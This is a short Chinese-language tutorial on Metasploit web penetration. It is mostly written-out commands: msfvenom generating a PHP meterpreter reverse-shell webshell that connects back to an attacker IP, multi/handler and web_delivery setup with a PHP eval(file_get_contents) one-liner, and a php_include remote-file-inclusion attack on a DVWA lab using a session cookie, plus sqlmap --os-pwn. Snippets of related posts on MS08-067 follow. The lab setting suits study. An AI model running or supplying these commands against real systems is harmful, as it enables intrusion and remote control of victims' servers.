msf生成webshell MSF之Web滲透

2021-10-16 19:29:09 字數 1652 閱讀 1217

webshellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.163 lport=3333 -f raw -o a.php  生成a.php

msf > use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > set lport 3333

msf exploit(handler) > exploit

通過sql注入寫許可權、上傳漏洞等,將a.php上傳到目標主機的web目錄下;

通過瀏覽器訪問a.php。

msf會獲得目標主機meterpreter型別的shell。

sql注入

sqlmap的--os-pwn引數,可以獲得目標的meterpreter型別的shell。

exploit/multi/script/web_delivery模組,配合命令執行漏洞使用msf exploit(handler) > use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.80.163

msf exploit(web_delivery) > set uripath /

msf exploit(web_delivery) > set srvport 80

msf exploit(web_delivery) > set target 1

在存在命令執行漏洞的**上,執行下面的命令,msf會獲得目標主機的shell。php -d allow_url_fopen=true -r "eval(file_get_contents(''));"

環境準備:

dvwa的low級別**預設存在本地檔案包含漏洞;但是不存在遠端檔案包含漏洞,我們需要自己設定。

從phpinfo中獲取到如下資訊。

本地配置檔案路徑

sudo /etc/init.d/apache2 restart

msf exploit(php_include) > set rhost 192.168.80.135

msf exploit(php_include) > set path /dvwa/vulnerabilities/fi

msf exploit(php_include) > set phpuri /?page=xxpathxx

msf exploit(php_include) > set headers "cookie: security=low; phpsessid=69fb8940243aa75ba98a8e6698139671"

msf exploit(php_include) > set payload php/meterpreter/reverse_tcp

msf exploit(php_include) > set lhost 192.168.80.163

exploit獲得shell

Msf 基本用法

msf 基本用法 msfconsole help nmap sn 192.168.208.0 24 主機發現 滲透攻擊過程 需要xp使用者登入系統後才可以利用成功。1.search ms08 067 2.use exploit windows smb ms08 067 netapi use expl...

MSF學習筆記

貴有恆何必三更眠五更起,最無益只怕一日曝十日寒 話不多說,上乾貨。滲透模組 exploit 執行時會利用目標主機漏洞進行攻擊。攻擊載荷模組 payload 在成功對目標完成一次滲透之後,這段程式開始在目標主機上執行,幫助我們獲取需要的訪問和行動許可權。輔助模組 auxiliary 包含一系列輔助支援...

MSF使用流程

1 天鏡 nessus 極光掃瞄器進行漏洞掃瞄,跟據漏掃結果去msf裡面進行查詢漏洞利用工具 2 開啟msf 通過search搜漏洞編號或漏洞名稱 3 搜到漏洞之後,用use 開啟msf漏洞利用工具 4 輸入info檢視工具相關說明 5 用show options 檢視工具使用方法 6 配置遠端主機...